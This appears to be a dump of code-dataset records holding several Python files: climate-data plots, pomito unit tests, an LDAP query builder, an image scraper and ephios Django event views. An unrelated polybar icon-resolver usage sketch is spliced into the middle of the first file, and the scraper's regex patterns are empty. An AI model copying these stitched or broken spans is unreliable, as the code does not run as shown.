dates\n ax.xaxis_date()\n if figname is None:\n plt.show()\n else:\n plt.savefig(figname)\n\n#------------------------------------------------------------------------------#\n\ndef plot_meltindex(data, figname=None):\n \"\"\"ADD FUNCTION DOCSTRING HERE\"\"\"\n\n plt.close('all')\n plt.style.use('default')\n fig, axes = plt.subplots(2,1)\n\n width = 90\n\n ax = axes[0]\n bar1 = ax.bar(df1.index, df1['melt'], width, color='r')\n bar2 = ax.bar(df4.index+dt.timedelta(width), df4, width, color='b')\n ax.set_ylabel('Melt Index')\n ax.set_xlim(['1978-1-1', '2017-1-1'])\n ax.set_title('Polar Stereographic Grid / Std. Dev. 
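A short usage sketch for the IconResolver above. Rules are (pattern, icon, colour) triples; a 'prop=' prefix on the pattern matches a window property other than class, and resolve() wraps the icon in polybar colour markup. This assumes the IconResolver class defined above is in scope; the rules and app dict are invented:

resolver = IconResolver([
    ('Firefox.*', 'F', '#ff9500'),            # matches on class, the default prop
    ('title=.*YouTube.*', 'Y', '#ff0000'),    # 'prop=' prefix targets another property
])

app = {'class': 'Firefox', 'title': 'arch wiki'}
print(resolver.resolve(app))     # '%{F#ff9500}F%{F-}' -- polybar colour markup
print(resolver.get_color(app))   # '#ff9500'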
Method')\n\n ax = axes[1]\n bar1 = ax.bar(df1.index, df1['melt'], width, color='r')\n bar2 = ax.bar(df3.index+dt.timedelta(width), df3, width, color='b')\n bar3 = ax.bar(df3b.index+dt.timedelta(2*width), df3b, width, color='dodgerblue')\n ax.set_ylabel('Melt Index')\n ax.set_xlim(['1978-1-1', '2017-1-1'])\n ax.set_title('EASE Grid / Threshold Method')\n ax.legend((bar1[0], bar2[0], bar3[0]), ('LGGE', 'SSMI', 'AMSR-E'), loc=1)\n\n if figname is None:\n plt.show()\n else:\n plt.savefig(figname)\n\n#==============================================================================#\n# MAPS\n#==============================================================================#\n\ndef map_tb(data, lats, lons, fout='map'):\n \"\"\"ADD FUNCTION DOCSTRING HERE\"\"\"\n\n plt.close('all')\n m = Basemap(projection='spstere', boundinglat=-60, lon_0=180, resolution='c')\n m.drawcoastlines(linewidth=1)\n m.drawmeridians(np.arange(0,360,30), linewidth=0.5, dashes=[4, 4])\n m.drawparallels(np.arange(-90,90,30), linewidth=0.5, dashes=[4, 4])\n datam = ma.masked_where(np.isnan(data), data)\n img = m.pcolormesh(lons, lats, datam, latlon=True, cmap=plt.cm.rainbow)\n cb = m.colorbar(img, 'right')\n plt.title('Placeholder Title')\n if fout is not None:\n plt.savefig(fout)\n\n#------------------------------------------------------------------------------#\n\ndef map_meltdays(data, lats, lons, figname=None):\n \"\"\"ADD FUNCTION DOCSTRING HERE\"\"\"\n\n fig = plt.figure()\n ax = fig.add_axes()\n m = Basemap(projection='spstere', boundinglat=-65, width=1000., lon_0=180, resolution='i')\n m.drawcoastlines(linewidth=1)\n m.drawmeridians(np.arange(0,360,30), linewidth=0.5, dashes=[4, 4])\n m.drawparallels(np.arange(-90,90,10), linewidth=0.5, dashes=[4, 4])\n datam = ma.masked_where(np.isnan(data), data)\n\n vmin = 1\n vmax = 15\n N = vmax-vmin+1\n base1 = plt.cm.get_cmap('tbrVar1')\n colors = base1(np.arange(34, 98))\n base2 = mcolors.ListedColormap(colors)\n colors = base2(np.linspace(0, 1, N))\n cmap = mcolors.ListedColormap(colors[:-1])\n cmap.set_under(color='0.6')\n cmap.set_over(color=colors[-1])\n\n img = m.pcolormesh(lons, lats, datam, latlon=True, vmin=vmin, vmax=vmax, cmap=cmap)\n plt.title('Number of melting days in Jan 2016')\n # cb = m.colorbar(mappable=img, location='bottom', drawedges=False, extend='both', size=\"3%\", pad=\"-8%\", ticks=np.arange(vmin, vmax+1))\n cbax = fig.add_axes([0.175, 0.15, 0.35, 0.02])\n cb = plt.colorbar(ax=ax, cax=cbax, orientation='horizontal', extend='both', ticks=np.arange(vmin, vmax+1))\n if figname is None:\n plt.show()\n else:\n plt.savefig(figname)\n return m, cb\n\n\n#------------------------------------------------------------------------------#\n","sub_path":"packages/melting/plots/basics.py","file_name":"basics.py","file_ext":"py","file_size_in_byte":5180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"470428080","text":"# -*- coding: utf-8 -*-\r\n# Tests for the Activity hook\r\n\r\nimport unittest\r\nfrom unittest.mock import Mock, patch\r\n\r\nfrom peewee import SqliteDatabase\r\n\r\nfrom pomito.hooks.activity import ActivityHook, ActivityModel\r\nfrom pomito.test import PomitoTestFactory\r\n\r\nimport fake_filesystem\r\nimport sure\r\n\r\nclass ActivityHookTests(unittest.TestCase):\r\n def setUp(self):\r\n test_factory = PomitoTestFactory()\r\n\r\n # Encapsulate platform concerns\r\n filesystem = fake_filesystem.FakeFilesystem()\r\n os_module = fake_filesystem.FakeOsModule(filesystem)\r\n 
test_factory.create_patch(self, 'os.path', os_module.path)\r\n        test_factory.create_patch(self, 'os.makedirs', os_module.makedirs)\r\n\r\n        ActivityModel.drop_table(True)\r\n\r\n        self.pomodoro_service = test_factory.create_fake_service()\r\n        self.activityhook = ActivityHook(self.pomodoro_service)\r\n        self.activityhook.initialize()\r\n\r\n    def tearDown(self):\r\n        ActivityModel.drop_table(True)\r\n        self.activityhook.close()\r\n\r\n    def test_initialize_sets_activity_db(self):\r\n        activityhook = ActivityHook(self.pomodoro_service)\r\n\r\n        activityhook.initialize()\r\n\r\n        ActivityHook.activity_db.shouldnt.be.equal(None)\r\n        activityhook.close()\r\n\r\n    def test_initialize_creates_signal_handlers(self):\r\n        activityhook = ActivityHook(self.pomodoro_service)\r\n\r\n        activityhook.initialize()\r\n\r\n        self._count_receivers(self.pomodoro_service.signal_session_stopped)\\\r\n            .should.be.equal(2)\r\n        self._count_receivers(self.pomodoro_service.signal_break_stopped)\\\r\n            .should.be.equal(2)\r\n        self._count_receivers(self.pomodoro_service.signal_interruption_stopped)\\\r\n            .should.be.equal(2)\r\n        activityhook.close()\r\n\r\n    def test_close_disconnects_signal_handlers(self):\r\n        activityhook = ActivityHook(self.pomodoro_service)\r\n        activityhook.initialize()\r\n\r\n        activityhook.close()\r\n\r\n        # Count is one because there is already a listener for self.activityhook\r\n        self._count_receivers(self.pomodoro_service.signal_session_stopped)\\\r\n            .should.be.equal(1)\r\n        self._count_receivers(self.pomodoro_service.signal_break_stopped)\\\r\n            .should.be.equal(1)\r\n        self._count_receivers(self.pomodoro_service.signal_interruption_stopped)\\\r\n            .should.be.equal(1)\r\n\r\n    def test_log_handles_session_stop_event(self):\r\n        test_task = self._create_task(100, 'session_start_task')\r\n        self.pomodoro_service.start_session(test_task)\r\n        self.pomodoro_service.stop_session()\r\n\r\n        ActivityModel.select().where(ActivityModel.category ==\\\r\n            'session').count().should.be.equal(1)\r\n\r\n    def test_log_handles_break_stop_event(self):\r\n        self.pomodoro_service.start_break()\r\n        self.pomodoro_service.stop_break()\r\n\r\n        self._dump_activity_model()\r\n        ActivityModel.select().where(ActivityModel.category ==\\\r\n            'break').count().should.be.equal(1)\r\n\r\n    def test_log_handles_interruption_stop_event(self):\r\n        self.pomodoro_service.start_interruption(None, False, False)\r\n        self.pomodoro_service.stop_interruption()\r\n\r\n        ActivityModel.select().where(ActivityModel.category ==\\\r\n            'interruption').count().should.be.equal(1)\r\n\r\n    def _create_task(self, uid, description):\r\n        from pomito.task import Task\r\n        return Task(uid=uid, description=description, estimate=0, actual=0,\r\n                    tags=None)\r\n\r\n    def _get_latest_entry(self):\r\n        pass\r\n\r\n    def _dump_activity_model(self):\r\n        for activity in ActivityModel.select():\r\n            print(\"{0};{1};{2}\".format(activity.timestamp, activity.category,\r\n                                       activity.data))\r\n\r\n    def _count_receivers(self, signal):\r\n        from blinker.base import ANY\r\n\r\n        return sum(1 for r in signal.receivers_for(ANY))\r\n","sub_path":"tests/hooks/test_activity.py","file_name":"test_activity.py","file_ext":"py","file_size_in_byte":3955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"354886584","text":"#######################################\n# LDAP Query Builder\n# Date: Aug 2018\n# Options:\n# -c configuration file location\n# -o output 
text file\n#\n#######################################\n#######################################\n### CodeBlock: Modules & Init Var\n#######################################\nimport os, json, re, sys\nfrom pprint import pprint\nfrom argparse import ArgumentParser\n\nsearchStrings = {}\n\n### Read passed arguments from the command line\nparser = ArgumentParser()\nparser.add_argument(\"-c\", \"--config\", dest=\"cfile\", help=\"read configuration from CONFIG json\", metavar=\"FILE\", type=str)\nparser.add_argument(\"-o\", \"--output\", dest=\"ofile\", help=\"write the search terms to the following out text file\", metavar=\"FILE\", type=str)\nargs = parser.parse_args()\n\nconfig=args.cfile\noutputf=args.ofile\n\n### Checks on passed arguments\n# Check the configuration file argument; if it was not passed, exit the script\nif config is None:\n    print(\"\\nNo Configuration file passed as argument. Exit on Error.\\n\")\n    exit()\n# Check the output file argument; if it was not passed, fall back to a default\nif outputf is None:\n    outputf=\"output.txt\"\n\n\n### If output file does not exist, create it\nif not os.path.exists(outputf):\n    open(outputf,'w+').close()\n\n### Intake file parser function - column-formatted data, example: Excel file with column header\ndef rowDataIntake (fileObj,searchAtt,delim):\n    ### Function (open_File_Object, Search Attribute)\n    ### Takes the open file object; on the first iteration it finds the index\n    ### of the search attribute in the header row, then collects the value at\n    ### that index from every following row.\n    it=1\n    output=[]\n    for line in fileObj:\n        line=(line.strip(\"\\n\")).split(delim)\n        ### only run on the first iteration through the intake file, match index to header for search attribute in config\n        if it == 1:\n            ind=line.index(searchAtt)\n            it=0\n            continue\n        output.append(line[ind])\n    return output\n### Intake file parser function - row-formatted data\ndef columnDataIntake (fileObj,searchAtt,delim):\n    ### Function (open_File_Object, Search Attribute)\n    ### Takes the open file object; every line matching the search-attribute\n    ### regex is split on the delimiter and its value appended to the output.\n    ### File examples: LDIF files\n    output=[]\n    for line in fileObj:\n        if re.search(searchAtt,line):\n            line=(line.strip(\"\\n\")).split(delim)\n            output.append(line[1]) ### Assumption: each matching line splits into 'attribute<delim>value', and the second field is the value we want\n    return output\n\n### Directory Ops\ncurDir = os.path.abspath(os.path.dirname(__file__))\n# curDir = \"/Users/z001mc0/IAE/Dev/LDIF/LDAP_QueryBuilder\"\n\n### Read JSON config file in\nwith open(config,'r') as configfo: #read config file object\n    configDict=json.load(configfo) #parse json into dictionary\n\n\n#######################################\n### CodeBlock: Create Search LDAP strings based on JSON config\n#######################################\n### only proceed if all required fields are in the parsed json dictionary, else report error\nif 'ldapSettings' in configDict and 'intake' in configDict:\n    # create head of the search string\n    ldapBegString = \"(\"+configDict['ldapSettings']['operator'] # with config relational operator\n    ldapEndString = \"))\"\n    # open the list to create search term from\n    with open(configDict['intake']['searchIntakeDir'],'r') as intakefo: #read intake file object\n        # dispatch on the declared data format, feeding the open file object to the matching search-term builder\n        if configDict['intake']['searchDataFormat'] == 'Row':\n            searchTermsList=rowDataIntake(intakefo, 
configDict['intake']['searchAttribute'], configDict['intake']['searchDelimiter'])\n        elif configDict['intake']['searchDataFormat'] == 'Column':\n            searchTermsList=columnDataIntake(intakefo, configDict['intake']['searchAttribute'], configDict['intake']['searchDelimiter'])\n        else:\n            print(\"\\nJSON intake file missing critical data: intake-searchDataFormat missing or not matched.\\nExit\\n\")\n            exit()\n    # iterate over the remaining config keys (the search bases); assumes they are the last entries after ldapSettings and intake\n    for searchBaseind in range(len(list(configDict)) - 2,len(list(configDict))):\n        ### join the search terms with \")(attribute=\" so every term becomes its own clause\n        tempString = (\")(\" + configDict[list(configDict)[searchBaseind]]['searchAttribute']+'=').join(searchTermsList)\n        ### join the temp string with ldap search beginning and end\n        searchStrings[list(configDict)[searchBaseind]] = ldapBegString + \"(\" + configDict[list(configDict)[searchBaseind]]['searchAttribute'] + \"=\" + tempString + ldapEndString\nelse:\n    print(\"\\nJSON missing critical attributes: intake or ldapSettings missing attributes\\nExit\\n\")\n\n#######################################\n### CodeBlock: write to output file\n#######################################\nwith open(outputf,'w+') as file:\n    file.write(json.dumps(searchStrings))\n","sub_path":"LDAP_QueryBuilder/ldapQueryBuilder.py","file_name":"ldapQueryBuilder.py","file_ext":"py","file_size_in_byte":5207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"475508212","text":"import requests\nimport re\n\n# r=requests.get(\"http://www.baidu.com\")\n# print(r.text)\n\n\n# User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36\n\nheaders = {\n    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'\n}\n\nr = requests.get('https://www.hexuexiao.cn/meinv/guzhuang/', headers=headers)\n# rs=requests.get('//t.cdn.ink/image/2020/01/2020020916481695-scaled.jpeg',headers=headers)\n\n\n# print(r.request.headers)\n# print(rs.text)\n\n# print(r.text)\n\n\nhtml = r.text\n\n# \n# \"你与星河,皆可收藏-唯美女生\"\n\n# urls=re.findall('',html)\nurls = re.findall('
', html)\nprint(urls)\n\nfor url in urls:\n    html_data = requests.get(url, headers=headers).text\n    # \n    jpgs = re.findall('', html_data)\n    print(jpgs)\n    img_data = requests.get(jpgs[0], headers=headers).content\n    # print(img_data)\n    # Save the image data to disk\n    file_name = jpgs[0].split('/')[-1]\n\n    with open('靓丽图片/img/' + file_name, mode='wb') as f:\n        f.write(img_data)\n        print(file_name)\n","sub_path":"靓丽图片/requests_tast.py","file_name":"requests_tast.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"35277332","text":"import functools\nimport json\nfrom calendar import _nextmonth, _prevmonth\nfrom datetime import datetime, timedelta\n\nfrom django.contrib import messages\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.core.exceptions import ValidationError\nfrom django.db.models import BooleanField, Case, Max, Min, Prefetch, When\nfrom django.forms import DateField\nfrom django.http import HttpResponse\nfrom django.shortcuts import get_object_or_404, redirect\nfrom django.urls import reverse, reverse_lazy\nfrom django.utils import timezone\nfrom django.utils.formats import date_format\nfrom django.utils.safestring import mark_safe\nfrom django.utils.timezone import get_current_timezone, make_aware\nfrom django.utils.translation import gettext as _\nfrom django.views import View\nfrom django.views.generic import (\n    CreateView,\n    DeleteView,\n    DetailView,\n    FormView,\n    ListView,\n    RedirectView,\n    TemplateView,\n    UpdateView,\n)\nfrom django.views.generic.detail import SingleObjectMixin\nfrom guardian.shortcuts import assign_perm, get_objects_for_user, get_users_with_perms\nfrom recurrence.forms import RecurrenceField\n\nfrom ephios.core.calendar import ShiftCalendar\nfrom ephios.core.forms.events import EventDuplicationForm, EventForm, EventNotificationForm\nfrom ephios.core.models import Event, EventType, Shift\nfrom ephios.core.services.notifications.types import (\n    CustomEventParticipantNotification,\n    EventReminderNotification,\n    NewEventNotification,\n)\nfrom ephios.core.signals import event_forms\nfrom ephios.extra.mixins import CanonicalSlugDetailMixin, CustomPermissionRequiredMixin\nfrom ephios.extra.permissions import get_groups_with_perms\n\n\ndef current_event_list_view(request):\n    if request.session.get(\"event_list_view_type\", \"list\") == \"calendar\":\n        return EventCalendarView.as_view()(request)\n    return EventListView.as_view()(request)\n\n\nclass EventListView(LoginRequiredMixin, ListView):\n    model = Event\n\n    def get_queryset(self):\n        return (\n            get_objects_for_user(self.request.user, \"core.view_event\")\n            .annotate(\n                start_time=Min(\"shifts__start_time\"),\n                end_time=Max(\"shifts__end_time\"),\n            )\n            .annotate(\n                can_change=Case(\n                    When(\n                        id__in=get_objects_for_user(self.request.user, [\"core.change_event\"]),\n                        then=True,\n                    ),\n                    default=False,\n                    output_field=BooleanField(),\n                )\n            )\n            .filter(end_time__gte=timezone.now())\n            .select_related(\"type\")\n            .prefetch_related(\"shifts\")\n            .prefetch_related(Prefetch(\"shifts__participations\"))\n            .order_by(\"start_time\")\n        )\n\n    def get_context_data(self, *, object_list=None, **kwargs):\n        kwargs.setdefault(\"eventtypes\", EventType.objects.all())\n        return super().get_context_data(**kwargs)\n\n\nclass EventDetailView(CustomPermissionRequiredMixin, CanonicalSlugDetailMixin, DetailView):\n    model = Event\n    permission_required = \"core.view_event\"\n\n    def get_queryset(self):\n        if 
self.request.user.has_perm(\"core.add_event\"):\n return Event.all_objects.all()\n return Event.objects.all()\n\n\nclass EventEditMixin:\n @functools.cached_property\n def plugin_forms(self):\n forms = []\n for __, resp in event_forms.send(sender=None, event=self.object, request=self.request):\n forms.extend(resp)\n return forms\n\n def get_context_data(self, **kwargs):\n kwargs[\"plugin_forms\"] = self.plugin_forms\n return super().get_context_data(**kwargs)\n\n def is_valid(self, form):\n return form.is_valid() and all(plugin_form.is_valid() for plugin_form in self.plugin_forms)\n\n def form_valid(self, form):\n response = super().form_valid(form)\n for plugin_form in self.plugin_forms:\n plugin_form.save()\n return response\n\n\nclass EventUpdateView(CustomPermissionRequiredMixin, EventEditMixin, UpdateView):\n model = Event\n queryset = Event.all_objects.all()\n permission_required = \"core.change_event\"\n\n def get_form(self, form_class=None):\n return EventForm(\n data=self.request.POST or None, user=self.request.user, instance=self.object\n )\n\n def post(self, request, *args, **kwargs):\n self.object = self.get_object()\n form = self.get_form()\n if self.is_valid(form):\n return self.form_valid(form)\n return self.form_invalid(form)\n\n\nclass EventCreateView(CustomPermissionRequiredMixin, EventEditMixin, CreateView):\n template_name = \"core/event_form.html\"\n permission_required = \"core.add_event\"\n accept_object_perms = False\n model = EventType\n\n def post(self, request, *args, **kwargs):\n form = self.get_form()\n self.object = form.instance\n if self.is_valid(form):\n return self.form_valid(form)\n return self.form_invalid(form)\n\n def dispatch(self, request, *args, **kwargs):\n self.eventtype = get_object_or_404(EventType, pk=self.kwargs.get(\"type\"))\n return super().dispatch(request, *args, **kwargs)\n\n def get_form(self, form_class=None):\n return EventForm(\n data=self.request.POST or None,\n user=self.request.user,\n eventtype=self.eventtype,\n )\n\n def get_context_data(self, **kwargs):\n inactive_events = Event.all_objects.filter(active=False)\n kwargs.setdefault(\"inactive_events\", inactive_events)\n kwargs.setdefault(\"eventtype\", self.eventtype)\n return super().get_context_data(**kwargs)\n\n def get_success_url(self):\n return reverse(\"core:event_createshift\", kwargs={\"pk\": self.object.pk})\n\n\nclass EventActivateView(CustomPermissionRequiredMixin, SingleObjectMixin, View):\n permission_required = \"core.add_event\"\n queryset = Event.all_objects.all()\n\n def post(self, request, *args, **kwargs):\n event = self.get_object()\n try:\n event.activate()\n messages.success(\n request,\n _(\"The event {title} has been saved.\").format(title=event.title),\n )\n except ValidationError as e:\n messages.error(request, e)\n return redirect(event.get_absolute_url())\n\n\nclass EventDeleteView(CustomPermissionRequiredMixin, DeleteView):\n queryset = Event.all_objects.all()\n permission_required = \"core.delete_event\"\n success_url = reverse_lazy(\"core:event_list\")\n\n\nclass EventArchiveView(CustomPermissionRequiredMixin, ListView):\n permission_required = \"core.view_past_event\"\n model = Event\n template_name = \"core/event_archive.html\"\n\n def get_queryset(self):\n return (\n get_objects_for_user(self.request.user, \"core.view_event\")\n .annotate(\n start_time=Min(\"shifts__start_time\"),\n end_time=Max(\"shifts__end_time\"),\n )\n .filter(end_time__lt=timezone.now())\n .select_related(\"type\")\n .order_by(\"-start_time\")\n )\n\n\nclass 
EventCopyView(CustomPermissionRequiredMixin, SingleObjectMixin, FormView):\n permission_required = \"core.add_event\"\n model = Event\n template_name = \"core/event_copy.html\"\n form_class = EventDuplicationForm\n\n def setup(self, request, *args, **kwargs):\n super().setup(request, *args, **kwargs)\n self.object = self.get_object()\n\n def form_valid(self, form):\n occurrences = form.cleaned_data[\"recurrence\"].between(\n datetime.now() - timedelta(days=1),\n datetime.now() + timedelta(days=730), # allow dates up to two years in the future\n inc=True,\n dtstart=datetime.combine(\n DateField().to_python(self.request.POST[\"start_date\"]), datetime.min.time()\n ),\n )\n for date in occurrences:\n event = self.get_object()\n start_date = event.get_start_time().date()\n shifts = event.shifts.all()\n event.pk = None\n event.save()\n assign_perm(\n \"view_event\", get_groups_with_perms(self.get_object(), [\"view_event\"]), event\n )\n assign_perm(\n \"change_event\", get_groups_with_perms(self.get_object(), [\"change_event\"]), event\n )\n assign_perm(\n \"change_event\",\n get_users_with_perms(\n self.get_object(), only_with_perms_in=[\"change_event\"], with_group_users=False\n ),\n event,\n )\n\n shifts_to_create = []\n for shift in shifts:\n shift.pk = None\n # shifts on following days should have the same offset from the new date\n offset = shift.start_time.date() - start_date\n # shifts ending on the next day should end on the next day to the new date\n end_offset = shift.end_time.date() - shift.start_time.date()\n current_tz = get_current_timezone()\n shift.end_time = make_aware(\n datetime.combine(\n date.date() + offset + end_offset,\n shift.end_time.astimezone(current_tz).time(),\n )\n )\n shift.meeting_time = make_aware(\n datetime.combine(\n date.date() + offset, shift.meeting_time.astimezone(current_tz).time()\n )\n )\n shift.start_time = make_aware(\n datetime.combine(\n date.date() + offset, shift.start_time.astimezone(current_tz).time()\n )\n )\n shift.event = event\n shifts_to_create.append(shift)\n Shift.objects.bulk_create(shifts_to_create)\n\n messages.success(self.request, _(\"Event copied successfully.\"))\n return redirect(reverse(\"core:event_list\"))\n\n\nclass RRuleOccurrenceView(CustomPermissionRequiredMixin, View):\n permission_required = \"core.add_event\"\n\n def post(self, *args, **kwargs):\n try:\n recurrence = RecurrenceField().clean(self.request.POST[\"recurrence_string\"])\n return HttpResponse(\n json.dumps(\n recurrence.between(\n datetime.now() - timedelta(days=1),\n datetime.now()\n + timedelta(days=730), # allow dates up to two years in the future\n inc=True,\n dtstart=datetime.combine(\n DateField().to_python(self.request.POST[\"dtstart\"]), datetime.min.time()\n ),\n ),\n default=lambda obj: date_format(obj, format=\"SHORT_DATE_FORMAT\"),\n )\n )\n except (TypeError, KeyError, ValidationError):\n return HttpResponse()\n\n\nclass HomeView(LoginRequiredMixin, TemplateView):\n template_name = \"core/home.html\"\n\n\nclass EventNotificationView(CustomPermissionRequiredMixin, SingleObjectMixin, FormView):\n model = Event\n permission_required = \"core.change_event\"\n template_name = \"core/event_notification.html\"\n form_class = EventNotificationForm\n\n def setup(self, request, *args, **kwargs):\n super().setup(request, *args, **kwargs)\n self.object = self.get_object()\n\n def form_valid(self, form):\n action = form.cleaned_data[\"action\"]\n if action == form.NEW_EVENT:\n NewEventNotification.send(self.object)\n elif action == form.REMINDER:\n 
EventReminderNotification.send(self.object)\n        elif action == form.PARTICIPANTS:\n            CustomEventParticipantNotification.send(self.object, form.cleaned_data[\"mail_content\"])\n        messages.success(self.request, _(\"Notifications sent successfully.\"))\n        return redirect(self.object.get_absolute_url())\n\n\nclass EventCalendarView(TemplateView):\n    template_name = \"core/event_calendar.html\"\n\n    def get_context_data(self, **kwargs):\n        today = datetime.today()\n        year = int(self.request.GET.get(\"year\", today.year))\n        month = int(self.request.GET.get(\"month\", today.month))\n        events = get_objects_for_user(self.request.user, \"core.view_event\", klass=Event)\n        shifts = Shift.objects.filter(\n            event__in=events, start_time__month=month, start_time__year=year\n        )\n        calendar = ShiftCalendar(shifts)\n        kwargs.setdefault(\"calendar\", mark_safe(calendar.formatmonth(year, month)))\n        nextyear, nextmonth = _nextmonth(year, month)\n        kwargs.setdefault(\n            \"next_month_url\", f\"{reverse('core:event_list')}?year={nextyear}&month={nextmonth}\"\n        )\n        prevyear, prevmonth = _prevmonth(year, month)\n        kwargs.setdefault(\n            \"previous_month_url\", f\"{reverse('core:event_list')}?year={prevyear}&month={prevmonth}\"\n        )\n        return super().get_context_data(**kwargs)\n\n\nclass EventListTypeSettingView(RedirectView):\n    def get_redirect_url(self, *args, **kwargs):\n        return reverse(\"core:event_list\")\n\n    def post(self, request, *args, **kwargs):\n        request.session[\"event_list_view_type\"] = request.POST.get(\"event_list_view_type\")\n        return self.get(request, *args, **kwargs)\n","sub_path":"ephios/core/views/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":13467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"151229866","text":"#!/usr/bin/env python3\n\n# flashtest.py\n# A hack to let a WGU student iterate through ALL of the C172 flashcards\n# in random order and present a set of \"similar\" multiple choice answers.\n\n\n# 1) click on the flashcard icon for a chapter\n# 2) go into the quiz mode\n# 3) Once the cards have loaded, view page-source\n# 4) look for a textarea box with an ID for flash_content.\n# 5) The flash_content has a jsonified array of all the questions\n#